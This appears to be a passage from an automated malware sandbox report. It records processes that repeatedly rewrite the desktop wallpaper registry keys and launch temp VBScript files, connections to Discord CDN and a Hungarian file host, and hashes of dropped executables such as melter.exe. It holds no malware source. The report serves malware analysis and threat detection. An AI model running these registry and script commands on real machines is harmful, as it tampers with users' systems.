reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | ddl8.data.hu | udp |
| HU | 217.65.97.75:443 | ddl8.data.hu | tcp |
| US | 8.8.8.8:53 | 75.97.65.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\489D.tmp\489E.tmp\489F.bat
| MD5 | e5097bb73edc13e33242930a46f4e976 |
| SHA1 | 1e644b0f44a4e1ea3612a3adea61d2a984f06605 |
| SHA256 | 97041695f1a22009f88d14a0ab45b61f6ef0c7fd962af2e7495de690df27cbe1 |
| SHA512 | 7581babda9be534dee091cb9d3bbef984ce0d7c11accdf1fcf409d446c156ba56759c24a822b83e9d9c5413702a99733838f6ed16b3d2e3bfe6ad03c5fe44a9e |
C:\Users\Admin\AppData\Local\Temp\26921.vbs
| MD5 | 17b8608905bad5079f8ef5d1c8b9aafb |
| SHA1 | 65864828c6bc101e9234453e0be83b46868f96e7 |
| SHA256 | 4d909b6c65777ad719bf85bd5e9de00739b962f2c0bab4a49c0c31fa268e93fc |
| SHA512 | 5f2fee37de012f090267c3ad1f4fa2ff5051aa4bf6c5a2a476a4b4e9b1272b16301d3c82d38f33732b767447de8da2ce967a26c1952048c1e8315c7d8e1bfbc1 |
C:\Users\Admin\AppData\Local\Temp\20725.vbs
| MD5 | 8a9b451fd9936100f33b576bb5ec3f02 |
| SHA1 | 80c92544f733ddfb96dffa296293fb2835e85f2e |
| SHA256 | 4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455 |
| SHA512 | b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f |
C:\Users\Admin\AppData\Local\Temp\4235.vbs
| MD5 | 523092d53a06f5b46778a0cd7c01d0fb |
| SHA1 | 221a8244271afdbe7ce105aaf189f1dbcfa57cdb |
| SHA256 | 09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e |
| SHA512 | 72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb |
C:\Users\Admin\AppData\Local\Temp\salope.exe
| MD5 | a1ca4bebcd03fafbe2b06a46a694e29a |
| SHA1 | ffc88125007c23ff6711147a12f9bba9c3d197ed |
| SHA256 | c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65 |
| SHA512 | 6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e |
C:\Users\Admin\AppData\Local\Temp\9391.vbs
| MD5 | ed4068f59e84632317fe338a2892ecb1 |
| SHA1 | 260ca0f384ec0784933794a7aed6fb0ac8aaec23 |
| SHA256 | 24baf9de71f49028cf6188127dea430347bee63f553225dc93c97db83a4ffeaf |
| SHA512 | 93774b5f8e54c16cf65db696613201b88bf64847e8558b8171ec7351e9cdc133a28df6a9f3269add80b8a588761bf9b2c40015cdd5b3e068cee9d069b66be1c5 |
C:\Users\Admin\AppData\Local\Temp\14246.vbs
| MD5 | 4148025b2c24c93fd1e7d85860e6b816 |
| SHA1 | 0b5b79f0c4d44b0ebdb990ee6b662f835a07dd98 |
| SHA256 | 3cb01880c6a02c5f8aad54ee9d5e6a3500777e20c4c07ea56fa267e16f3ad7e0 |
| SHA512 | bdf85f2a0581895a28b93dc7038b2d269bdc4a290b778fe3467834b5d8d203f340f41563cfc9c77e22f63a7646c5ce83861c94f687d2dbda06055163a6f8a943 |
C:\Users\Admin\AppData\Local\Temp\23948.vbs
| MD5 | 27bf402bae00ba56abb7fce0eac5fe88 |
| SHA1 | 7b17239cc71d9a3bd2a42307cc7059a2b2616ce7 |
| SHA256 | f54c91b6da58a43d45cd300670055e9569f7006a6428fd5e875b0c59feb0771d |
| SHA512 | 6cc36a79ed28cf292c4e6220ee026f3dc47779684600801d60424ca64a53cbff453e983f97559dc93927cccac94a23bf2c0f49cb826b047db9b409fe599c37ef |
C:\Users\Admin\AppData\Local\Temp\26852.vbs
| MD5 | ec385d968eea8bf5abe4587305f39c89 |
| SHA1 | 6509b0bb7cb6432a4c723f37dc7593116ad57c64 |
| SHA256 | 98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96 |
| SHA512 | d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8 |
C:\Users\Admin\AppData\Local\Temp\31845.vbs
| MD5 | 1dbb89d3ca69d397acdc3b541bd64a44 |
| SHA1 | 8b4701b28662019ac5e023e90e24df288681f4b6 |
| SHA256 | b7ff0828abf1aee9e3cde2edfc9e936c87f324f200a6f31af969e0e19608d6c4 |
| SHA512 | 7e6a2ceccc21b81e5525a14303ed31d6056be4991a5e80ef8bbe2d968e26963268ad20fc4ed1e16037e8cd79bb2fdee556f15d2dc5a9f26017f8d92127faa1cd |
C:\Users\Admin\AppData\Local\Temp\28089.bat
| MD5 | 2be0daca40c0accdf8900515a304b2d9 |
| SHA1 | dbfd7fcb8b1285fe79bafa1d2fea0cb91369ae0d |
| SHA256 | 23129bf85a33c39d4f80c6ebf8aeb8fc752c697f5aa17209825ee64a87a0ffa0 |
| SHA512 | a6be01fc1e5e5858a360dfc548035cf0a06d33dd0ec0da1f0039fe7710f67113dbb0dbfe89eb1957172108add2692545a3a19ebe8320cdc0a0d2a93409b9fc3f |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD
| MD5 | 90be2701c8112bebc6bd58a7de19846e |
| SHA1 | a95be407036982392e2e684fb9ff6602ecad6f1e |
| SHA256 | 644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf |
| SHA512 | d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe |
C:\Users\Admin\AppData\Local\Temp\risitas.hta
| MD5 | af25ddf889ed3804a85b487a95993a94 |
| SHA1 | e22ce7ce7e6b18400913de410be90fa79c2b6edb |
| SHA256 | bfa65bf74a7c96fc8a0ffc527d2fb143d349059466d6248fe2c0d45212baa3ab |
| SHA512 | 8f5a9eef4daee35d9ff9e7a2f9c4ba92cc89a5443a9cf5e563dc23317a1546862b3b73be865ba1aa0e2668d5bee84d05fd66042171235a35347794ab6aa3297c |
C:\Users\Admin\AppData\Local\Temp\melter.exe
| MD5 | d9baac374cc96e41c9f86c669e53f61c |
| SHA1 | b0ba67bfac3d23e718b3bfdfe120e5446d0229e8 |
| SHA256 | a1d883577bcb6c4f9de47b06fe97c370c09bddffb6569b6cf93576371bdbc412 |
| SHA512 | 4ecdf8757e75b02da06a9d42a8ca62b9f2ef292dc04fa37d96603af78433f8aa9dd82fcf1e128a8f463b9691dcc1645b4a64e34f3c5d631f3a0e0670da0d0457 |
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | 48e64826caf62774420deff568a1963c |
| SHA1 | f058d03975cb2301a6cf5ba2e100861788bb128d |
| SHA256 | c9c6cc0a1cc828386fcc1f4780909d26e7d4659b13f0d29660b3e8d2870c7b93 |
| SHA512 | 7815d74a162e69bfe042a0b056d77bcd0c1406e8f45a2a67a748f8c6f6982ce286b849594ec6369438952073b551023259b296ee299b7b95d272473fc86f88d9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_A252AE74B42D4524ACB318EAE2BE4DE9.dat
| MD5 | 08b5d76d42c7dd68551f85fbdb3a27e5 |
| SHA1 | ebd592af371840f90386b52a899fa87c2dbaa9f3 |
| SHA256 | c4e105ab6e498efe645038276e7cdeb9bddeb06041c92caa85c16f357a0c29b6 |
